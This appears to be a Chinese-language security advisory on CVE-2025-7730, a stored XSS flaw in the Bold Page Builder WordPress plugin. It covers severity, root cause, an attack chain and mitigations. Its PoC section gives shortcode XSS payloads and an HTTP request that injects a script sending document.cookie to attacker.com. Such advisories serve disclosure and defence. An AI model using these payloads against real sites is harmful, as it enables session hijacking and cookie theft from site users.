CVE-2025-7730 WordPress Bold Page Builder存储型XSS漏洞

漏洞信息

漏洞编号

CVE-2025-7730

漏洞类型

存储型跨站脚本攻击(XSS)

CVSS评分

6.4 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Bold Page Builder WordPress插件

漏洞概述

CVE-2025-7730是WordPress Bold Page Builder插件中的一个存储型跨站脚本(XSS)漏洞。该漏洞存在于所有5.4.5及以下版本中，由于插件对'percentage'参数缺乏充分的输入清理和输出转义，导致恶意JavaScript代码可以被永久存储在数据库中。攻击者只需拥有Contributor(贡献者)级别或更高的权限即可利用此漏洞。通过在页面进度条元素的百分比参数中注入恶意脚本，这些脚本将在其他用户访问被注入的页面时自动执行，可能导致会话劫持、敏感信息窃取或进一步的恶意操作。由于存储型XSS的特性，攻击具有持久性，影响范围广泛。

技术细节

漏洞根源在于Bold Page Builder插件的bt_bb_progress_bar.php文件中第90行附近的代码。该组件在处理进度条百分比参数时，未对用户输入进行适当的HTML实体转义。攻击者可以利用Contributor及以上权限，在创建或编辑页面时，通过进度条元素的percentage参数注入包含<script>标签或事件处理器(如onerror、onload)的恶意代码。由于插件直接将该参数值输出到HTML页面而未进行转义，恶意脚本被浏览器解析执行。CVSS 3.1向量显示攻击复杂度低(AC:L)，权限要求低(PR:L)，无需用户交互(UI:N)，但影响范围为已更改页面(S:C)。攻击成功后可窃取用户Cookie、劫持会话、执行任意JavaScript操作或重定向用户到钓鱼页面。

攻击链分析

STEP 1

信息收集

攻击者识别目标网站使用的WordPress版本及Bold Page Builder插件版本(≤5.4.5)，确认插件已安装并启用

STEP 2

权限获取

攻击者通过钓鱼、凭证泄露或注册功能获取WordPress账户(需Contributor级别或更高权限)

STEP 3

漏洞利用

在页面编辑界面添加进度条元素，通过percentage参数注入恶意XSS payload，如<script>标签或事件处理器

STEP 4

脚本存储

包含恶意代码的页面被保存到数据库，恶意脚本永久存储在服务器端

STEP 5

触发执行

当其他用户(管理员、访问者等)访问被注入的页面时，浏览器解析HTML并执行存储的恶意JavaScript代码

STEP 6

攻击完成

攻击者通过XSS成功窃取用户Cookie、会话令牌，或执行进一步的攻击如CSRF、蠕虫传播等

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

<!-- CVE-2025-7730 PoC: Stored XSS via percentage parameter -->
<!-- Requires Contributor-level access or higher -->

<!-- Method 1: Using script tag -->
[bt_bb_progress_bar percentage='" onerror="alert(String.fromCharCode(88,83,83))" data-xss="' percentage_value='50' text='Progress'][/bt_bb_progress_bar]

<!-- Method 2: Using event handler -->
[bt_bb_progress_bar percentage='<img src=x onerror=alert(document.cookie)>' percentage_value='75' text='Test Progress'][/bt_bb_progress_bar]

<!-- Method 3: Simple payload -->
[bt_bb_progress_bar percentage='"><script>alert("XSS")</script>' percentage_value='100' text='Malicious'][/bt_bb_progress_bar]

<!-- HTTP Request Example -->
POST /wp-json/wp/v2/pages/{page_id} HTTP/1.1
Host: target.com
Content-Type: application/json
Authorization: Bearer {contributor_token}

{
  "content": "[bt_bb_progress_bar percentage='<script>fetch(\"https://attacker.com/steal?c=\"+document.cookie)</script>' percentage_value='50'][/bt_bb_progress_bar]"
}

影响范围

Bold Page Builder ≤ 5.4.5 (所有版本)

防御指南

临时缓解措施

如果无法立即升级插件，可采取以下临时措施：(1)限制新用户注册为Contributor或更高角色；(2)对所有使用Bold Page Builder的页面进行手动审查，删除可疑内容；(3)使用WordPress安全插件(如Wordfence)监控和拦截XSS攻击；(4)临时禁用进度条功能直到补丁发布；(5)实施严格的CSP策略减少XSS影响范围。